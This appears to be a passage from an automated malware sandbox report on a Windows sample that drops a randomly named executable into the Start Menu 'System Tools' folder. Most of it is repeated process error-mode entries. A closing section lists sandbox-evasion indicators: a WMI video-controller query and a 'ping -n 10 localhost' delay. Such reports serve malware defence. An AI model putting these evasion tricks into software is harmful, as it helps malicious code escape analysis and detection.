                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX

                            Malware Analysis System Evasion

                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                            Source: C:\Users\user\Desktop\teh76E2k50.exe Memory allocated: 12E0000 memory reserve | memory write watch
                            Source: C:\Users\user\Desktop\teh76E2k50.exe Memory allocated: 1AFE0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe Memory allocated: 1200000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe Memory allocated: 1ABE0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe Memory allocated: B90000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe Memory allocated: 1A9F0000 memory reserve | memory write watch
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe Memory allocated: 1400000 memory reserve | memory write watch
